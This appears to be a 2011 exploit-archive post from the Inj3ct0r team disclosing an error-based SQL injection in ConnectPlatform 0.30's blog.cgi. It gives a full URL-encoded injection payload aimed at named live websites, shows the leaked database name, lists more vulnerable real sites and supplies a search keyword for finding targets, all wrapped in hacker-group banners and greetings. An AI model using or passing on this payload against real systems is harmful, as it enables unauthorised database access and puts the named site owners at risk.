Home / exploits ConnectPlatform 0.30 SQL Injection
Posted on 28 April 2011
============================================================ ConnectPlatform <= Remote (blog.cgi) Based SQL Injection ============================================================ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KnocKout member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com [~] HomePage : http://h4x0resec.blogspot.com - http://griadamlar.com - 1337day.com [~] Reference : http://h4x0resec.blogspot.com ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : ConnectPlatform |~Price : N/A |~Version : 0.30 |~Software: http://connectplatform.com/ |~Vulnerability Style : Cookie Handling |~Vulnerability Dir : / |~Google Keyword : Powered by: PHPDirector 0.30 |[~]Date : "26.04.2011" |[~]Tested on : Web Server: Apache/2.2.3 (CentOS) DB Server: MySQL AND demos ---------------------------------------------------------- blog.cgi <= 'id' Functions Not Security --------------------------------------------------------- Demos http://jobs.blacknews.com/cgi-bin/ http://blackcollegemagazine.com/cgi-bin/ http://www.irshelp.tv/cgi-bin/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== |{~~~~~~~~ Explotation| SQL Injection ~~~~~~~~~~}| http://jobs.blacknews.com/cgi-bin/blog.cgi?id=1 'SQL Console' START! example : http://jobs.blacknews.com [~] SQL Injecting(Db Name Get..) http://jobs.blacknews.com/cgi-bin/blog.cgi?cid=Inj3ct0r%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1 [~]MysqL Error : Duplicate entry '~'hbcu_central'~1' for key 1 [+]Database Name is found "hbcu_central" to Continue Explotation region Example Based error attack = > http://www.1337day.com/exploits/14509 ================================================================ # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... .__ _____ _______ | |__ / | |___ __ _ \_______ ____ | | / | | / / /_ \_ __ \_/ __ \n| Y / ^ /> < \_/ | / ___/ |___| /\____ |/__/\_ \_____ /__| \___ > / |__| / / / _____________________________ / _____/\_ _____/\_ ___ \n\_____ | __)_ / / / | \ \____ /_______ //_______ / \______ / / / / & __ ____/___ __ \___ |_ / /___ / / /___ |___ __/___ / _ / __ __ /_/ /__ /| |__ / __ /_/ / __ /| |__ / __ / / /_/ / _ _, _/ _ ___ |_ / _ __ / _ ___ |_ / _ /__ \____/ /_/ |_| /_/ |_|/_/ /_/ /_/ /_/ |_|/_/ /____/ KaCaK - MUS4LLAT - ameN - TechnicaL - Neuromancer - MahseN _____ __________ /_______ _________________ __ ___/_ __/_ __ `/__ ___/__ ___/ _(__ ) / /_ / /_/ / _ / _(__ ) /____/ \__/ \__,_/ /_/ /____/
